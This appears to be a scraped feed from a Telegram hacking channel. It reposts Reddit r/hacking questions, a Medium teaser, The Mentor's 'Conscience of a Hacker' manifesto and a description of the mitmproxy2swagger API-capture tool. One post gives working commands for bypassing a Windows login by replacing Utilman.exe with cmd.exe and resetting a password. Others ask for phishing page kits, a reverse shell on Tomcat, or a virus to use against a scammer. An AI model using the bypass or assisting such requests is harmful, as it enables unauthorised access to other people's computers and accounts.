Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
What do Ethical hackers do?

https://cdn-images-1.medium.com/max/2600/1*gNkD3tc-206IoEWS0GHNGg.jpeg
Is denial of provider, intrusion detection, and hacking net servers your ideas for amusing? If yes, then taking a career as an Information…

Continue reading on Medium »
Hey Hello, Security guys & Hacker Thank you for your support.Continue reading on Medium » (https://akash0x0.medium.com/p3-bug-in-just-2-minute-fc6bf1710757?source=rss------bug_bounty-5)
hacking: security in practice
External infrastructure pen test query

Hey everyone, I have a question regarding external infrastructure/network pen testing, or more accurately, I'd like to understand the definition of an external infrastructure/network pen test of a company.

Let's say there's a company who require an external infrastructure pen test, they have multiple branches each with computers, printers, various servers for file sharing, a web server etc. My understanding would be the scoped area would be all externally facing IP addresses of those servers, printers, networks etc. So if for example they have a server with files which was accessible externally, you'd scan the IP of that server and look into what software is installed, how it's configured and find potential ways into that server. Is that right?

My confusion lies with cloud based services. Let's say that same company no longer has a physical onsite server for their file sharing, but instead uses Amazon buckets for all their files, would this also be included in an external infrastructure pen test or would it fall under another category such as 'cloud pen testing?

Thank you

submitted by /u/Tall_Bandicoot_7989
[link] [comments]
hacking: security in practice
Phishing pages

Are there any readymade webpage files of sites such as facebook, gmail, tiktok etc for phishing?

submitted by /u/random-nepali
[link] [comments]
hacking: security in practice
Dealing with Apache Tomcat version 7.0.14

Hello guys. I came across in a situation where I am stucked at. So I am dealing with Apache Tomcat version 7.0.14 with JSP Coyote engine 1.1. The goal is to try to upload a file on the web server or run arbitrary code so I get reverse shell.. Ive looked into the vulnerabilities CVE's of this version.. but really couldnt help me much for that matter. The machine is Linux and there is no manager/html on the webserver, or atleast they dont use the default URL or is removed at all. I mean I dont see where I can try any credentials.

submitted by /u/mirahacker
[link] [comments]
hacking: security in practice
Tutorial For Bypassing Windows Login Passwords.

You Will Need A USB Drive With A Linux ISO Image Flashed Into It.(I Recomend grml64-small)

Boot Into Your Flash Drive And Type These Commands

fdisk -l

mount -t ntfs /dev/(windows drive) /mnt

cd /mnt/Windows/System32

cp cmd.exe Utilman.exe

reboot

Click On The Accesibility Button And Type This Command When The CMD Window Lauches

net user (User) *

submitted by /u/riggasTor
[link] [comments]
hacking: security in practice
Scam a scammer

Hello, i was chatting with an Instagram scammer that already has opened an grabify Link and i think he also would open other links so does anybody maybe knows good sites/programs to maybe make a kind of virus to scam the scammer ?

submitted by /u/Duduxy187
[link] [comments]
hacking: security in practice
The Conscience of a Hacker by The Mentor

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world... Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me... Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will- ing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

submitted by /u/Cycode
[link] [comments]
P3 Bug in Just 2 Minute

Hey Hello, Security guys & Hacker Thank you for your support.Continue reading on Medium »
Read more...
Mitmproxy2Swagger - Automagically Reverse-Engineer REST APIs Via Capturing Traffic
http://www.kitploit.com/2022/05/mitmproxy2swagger-automagically-reverse.html
A tool for automatically converting mitmproxy (https://mitmproxy.org/) captures to OpenAPI 3.0 (https://swagger.io/specification/) specifications. This means that you can automatically reverse-engineer REST APIs by just running the apps and capturing the traffic.
Installation First you will need python3 and pip3. $ pip install mitmproxy2swagger
# ... or ...
$ pip3 install mitmproxy2swagger Then clone the repo and run mitmproxy2swagger as per examples below. Usage Mitmproxy To create a specification by inspecting HTTP traffic (https://www.kitploit.com/search/label/Traffic) you will need to: Capture the traffic by using the mitmproxy (https://www.kitploit.com/search/label/MITMproxy) tool. I personally recommend using mitmweb, which is a web interface built-in to mitmproxy. $ mitmweb
Web server listening at http://127.0.0.1:8081/
Proxy server listening at http://*:9999
... IMPORTANT To configure your client (https://www.kitploit.com/search/label/Client) to use the proxy exposed by mitm proxy, please consult the mitmproxy documentation (https://docs.mitmproxy.org/stable/) for more information. Save the traffic to a flow file. In mitmweb you can do this by using the "File" menu and selecting "Save":
Run the first pass of mitmproxy2swagger: $ mitmproxy2swagger -i -o -p Please note that you can use an existing schema, in which case the existing schema will be extended with the new data. You can also run it a few times with different flow captures, the captured data will be safely merged. is the base url of the API you wish to reverse-engineer. You will need to obtain it by observing the requests being made in mitmproxy. For example if an app has made requests like these: https://api.example.com/v1/login
https://api.example.com/v1/users/2
https://api.example.com/v1/users/2/profile
The likely prefix is https://api.example.com/v1. Running the first pass should have created a section in the schema file like this: x-path-templates:
# Remove the ignore: prefix to generate an endpoint with its URL
# Lines that are closer to the top take precedence, the matching is greedy
- ignore:/addresses
- ignore:/basket
- ignore:/basket/add
- ignore:/basket/checkouts
- ignore:/basket/coupons/attach/{id}
- ignore:/basket/coupons/attach/104754 You should edit the schema file with a text editor and remove the ignore: prefix from the paths you wish to be generated. You can also adjust the parameters appearing in the paths. Run the second pass of mitmproxy2swagger: $ mitmproxy2swagger -i -o -p [--examples] Run the command a second time (with the same schema file). It will pick up the edited lines and generate endpoint descriptions. Please note that mitmproxy2swagger will not overwrite existing endpoint descriptions, if you want to overwrite them, you can delete them before running the second pass. Passing --examples will add example data to requests and responses. Take caution when using this option, as it may add sensitive data (tokens, passwords, personal information (https://www.kitploit.com/search/label/Personal%20Information) etc.) to the schema. HAR Capture and export the traffic from the browser DevTools. In the browser DevTools, go to the Network tab and click the "Export HAR" button.
Continue the same way you would do with the mitmproxy dump. mitmproxy2swagger will automatically detect the HAR file and process it. Example output See the examples (https://github.com/alufers/mitmproxy2swagger/blob/master/example_outputs). You will find a generated schema there and an html file with the generated documentation (via redoc-cli (https://www.npmjs.com/package/redoc-cli)). See the generated html file here (https://raw.githack.com/alufers/mitmproxy2swagger/master/example_outputs/lisek-static.html).

Download Mitmproxy2Swagger (https://github.com/alufers/mitmproxy2swagger)